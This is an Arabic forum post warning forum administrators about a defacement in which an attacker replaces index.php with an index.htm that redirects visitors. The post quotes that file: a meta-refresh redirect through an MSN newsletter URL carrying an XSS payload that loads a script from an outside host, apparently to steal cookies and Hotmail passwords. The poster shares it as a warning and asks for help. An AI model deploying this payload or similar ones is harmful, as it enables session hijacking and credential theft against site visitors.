اختراق المنتديات بأسلوب جديد
الايام الماضية تم اختراق اكثر من منتدى وموقع
مع العلم ان المنتدى مافيه لاتحميل صور ولا فيه مكتبة صور
وكان المخترق يحذف ملف index.php من مجلد المنتدى
ويستبدله بملف index.htm
-------------------------------------------------------------------
واذا دخل الاعضاء حولهم لموقع ثاني وبعدها تتم سرقة الكوكيز وسرقة باسوردات الهوتميل
الكود
<html dir="rtl">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title></title>
</head>
<body>
<meta http-equiv="refresh" content="0;URL=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=%23E%3Cscript%20src=http://www.scout4ever.com/opC/script%3E">
</body>
</html>
الكود محذوف منه بعض الاحرف
ولكن يشير الي موقع http://www.scout4ever.com
الحذر وأعتقد أنه يستغل ثغرة xss
وثغرة في الهوتميل
ياليت أحد يعطينا طريقة لان الملف هذا حتي لو تحذفه راح يرفع مره ثانية
وما أدري أي ثغرة هو يستغل ولكن اغلب الظن انها الصندوق السحري
الله يشل أيده ويستر علي أهل المنتديات
__________________
كلماتان خفيفتان عل السان ثقيلتان فى الميزان حبيبتان الى الرحمن سبحان الله وبحمدة سبحان الله العظيم